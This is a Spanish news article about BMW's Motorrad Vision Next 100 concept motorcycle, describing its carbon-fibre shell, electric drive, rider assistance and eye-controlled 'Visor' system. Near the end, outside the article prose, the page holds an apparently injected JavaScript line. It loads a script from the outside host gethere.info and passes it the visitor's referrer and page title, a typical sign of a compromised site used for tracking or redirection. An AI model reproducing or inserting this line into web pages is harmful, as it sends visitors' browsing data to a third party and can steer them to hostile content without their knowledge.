Las nuevas motos de BMW parecen del salidas del futuro

El día de ayer, y para celebrar su aniversario número 100, el fabricante de automóviles alemán BMW @BMW dio a conocer un nuevo concepto de motocicletas en la ciudad de Los Ángeles. Se trata de la Motorrad Vision Next 100, y es radical en su forma y en su funcionamiento. Su cuerpo está entresacado de un caparazón de fibra de carbono que forma una especie de curva. Al tiempo que su manillar nos recuerda un poco al de una bicicleta.

La moto es un plan a futuro y como es propio de un producto de este tipo funciona de manera eléctrica, cuenta con cero emisiones de carbono e incorpora un asistente para el conductor. Además de un sensor basado en la tecnología de su cámara, lo que la convierte en la moto más segura.

También sorprende que la incorporación de un sistema operativo llamado Visor, que se controla a través del movimiento de los ojos permitiendo tener un control total del panorama y su sistema de auto equilibrio.

 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|
Comentarios